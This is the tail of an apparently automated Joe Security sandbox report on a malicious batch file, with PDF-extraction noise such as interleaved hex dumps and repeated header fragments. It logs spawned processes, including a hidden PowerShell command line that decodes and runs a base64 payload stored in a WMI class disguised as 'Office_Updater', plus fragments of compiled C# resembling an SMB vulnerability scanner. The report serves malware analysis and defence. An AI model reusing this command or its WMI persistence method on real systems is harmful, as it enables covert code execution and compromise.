21 Programmed in: C, C++ or other language Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084 Start time: 04:06:20 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\System32\NETSTAT.EXE 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 0x74d bytes 32297BB17E6EC700D0FC869F9ACAF561 C, C++ or other language File Activities File Path Offset Length Value Ascii Completion Count Analysis Process: csc.exe PID: 3416 Parent PID: 3084 Start time: 04:06:23 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\Microsoft.NET\Framework\v \csc.exe 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig er\appdata\local\temp\rjax4qnu.cmdline' 0x75a bytes 0A1C81BDCB030222A0B0A652B2C89D8D.Net C# or VB.NET File Activities File Path Access Attributes Options Completion Count File Path Completion Count File Path Offset Length Value Ascii Completion Count Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416 Start time: 04:06:23 Start date: 24/01/2018 Path: Wow64 process (32bit): C:\Windows\Microsoft.NET\Framework\v \cvtres.exe Copyright Joe Security LLC 2018 Page 21 of 26

22 Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\users\user\ AppData\Local\Temp\CSC278A.tmp' 0x752a bytes 200FC355F85ECD4DB77FB3CAB2D01364 C, C++ or other language File Activities File Path Offset Length Value Ascii Completion Count Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084 Start time: 04:06:24 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\System32\NETSTAT.EXE 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 0x74d bytes 32297BB17E6EC700D0FC869F9ACAF561 C, C++ or other language File Activities File Path Offset Length Value Ascii Completion Count Analysis Process: powershell.exe PID: 3464 Parent PID: 3084 Start time: 04:06:24 Start date: 24/01/2018 Path: Wow64 process (32bit): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ( [WmiClass] 'root\default:office_updater').properties['mon'].value;$funs = ([WmiClass] 'root\default: Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([S ystem.convert]::frombase64string($funs)));invoke-command -ScriptBlock $RemoteScriptBlock - $mon, 'Void', 0, '', '')' Imagebase: File size: MD5 hash: Programmed in: 0x774a bytes 92F44E405DB16AC55D97E3BFE3B132FA.Net C# or VB.NET File Activities File Created File Path Access Attributes Options Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.tmp read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW Copyright Joe Security LLC 2018 Page 22 of 26

23 File Path Access Attributes Options Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW C:\Users\user\AppData\Local\Temp\oyswbnum.dll read attributes none and synchronize and generic read and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW C:\Users\user\AppData\Local\Temp\oyswbnum.out read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW C:\Users\user\AppData\Local\Temp\oyswbnum.err read attributes none and synchronize and generic write synchronous io non alert and n on directory file and open no recall success or wait F CreateFileW File Deleted File Path Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.dll success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.pdb success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.out success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.err success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.tmp success or wait D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs success or wait D2 DeleteFileW Old File Path New File Path Completion Count File Written File Path Offset Length Value Ascii Completion Count Copyright Joe Security LLC 2018 Page 23 of 26

24 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown 4096 ef bb bf e 67...using System;..using d 3b 0d 0a e d 2e 43 6f 6c 6c f 6e 73 2e e b 0d 0a e d 2e e 6f b 0d 0a e d 2e 49 4f 3b 0d 0a 75 System.Collections.Generic;..usin g S ystem.diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..usin g System.Text;...namespac e PingCastle.Scanners.. {...public class m17sc... {...static public bool Scan(stri e d 2e 4e b 0d 0a e d 2e 4e e 53 6f 63 6b b 0d 0a e d 2e b 0d 0a 0d 0a 6e 61 6d e c 65 2e e 6e d 0a 7b 0d 0a c c d d 0a 09 7b 0d 0a c f 6f 6c e C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown d 20 6e e d b 0d 0a b 5d d 20 6e b 5d 20 7b 0d 0a c c c c 20 0d 0a c c c c 20 0d 0a c 20 0d 0a c 20 0d 0a c 20 0d 0a c c 20 0d 0a c 20 0d 0a c c 20 0d 0a c c 20 0d 0a c c c c c c c success or wait WriteFile der = new BinaryReader(ms);.....byte[] part1 = new byte[] {...0x00,0x00,0x00,0x00,...0xff,0x53,0x4d,0x42,...0x75,...0x00,...0x00,...0x00,0x00,...0x18,...0x01,0x28,...0x00,0x00,...0x00,0x00,0x00,0x00,0 x00,0x00,0x00,0x success or wait WriteFile Copyright Joe Security LLC 2018 Page 24 of 26

25 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69.../t:library /utf8output /R:" success or wait WriteFile f f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 System.dll" /R:"C:\Windows\ass embly\gac_msil\system. Manageme nt.automation\ bf385 6ad364e35\System.Manag ement.automation.dll" /out:"c:\users\u ser\appdata\local\temp\o yswbnum.dll" /D:DEBUG /debug+ /optimize- 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f a a 5c c c b e 5c c 4c 6f c 5c d 70 5c 6f e 75 6d 2e 64 6c 6c f 44 3a f b 20 2f 6f d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\oyswbnum.out unknown 422 ef bb bf 43 3a 5c C:\Users\user\Desktop> success or wait WriteFile c c b e 5c b 74 6f 70 3e a 5c e 64 6f c 4d 69 "C:\ Windows\Microsoft.NET\Fr amewor k\v \csc.exe" /t:library /utf8output /R:"System.dll" f 73 6f e /R:"C:\Windows\assembly\ 4e c d f 72 6b 5c e 30 2e c e f 74 3a 6c f GAC_M SIL\System.Management. Automati on\ bf3856ad36 4e35\S ystem.management.autom ation.dll" /o 38 6f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f Analysis Process: csc.exe PID: 3552 Parent PID: 3464 Start time: 04:06:42 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v \csc.exe Wow64 process (32bit): Copyright Joe Security LLC 2018 Page 25 of 26

26 Commandline: Imagebase: File size: MD5 hash: Programmed in: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig er\appdata\local\temp\oyswbnum.cmdline' 0x74db bytes 0A1C81BDCB030222A0B0A652B2C89D8D.Net C# or VB.NET Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552 Start time: 04:06:43 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\users\user\ AppData\Local\Temp\CSC75BC.tmp' 0x752a bytes 200FC355F85ECD4DB77FB3CAB2D01364 C, C++ or other language Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084 Start time: 04:06:47 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\System32\NETSTAT.EXE 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 0x6e bytes 32297BB17E6EC700D0FC869F9ACAF561 C, C++ or other language Disassembly Code Analysis Copyright Joe Security LLC 2018 Page 26 of 26

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version: ID: 6036 Sample Name: wtf.bat Cookbook: default.jbs Time: 1:32:35 Date: 19/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification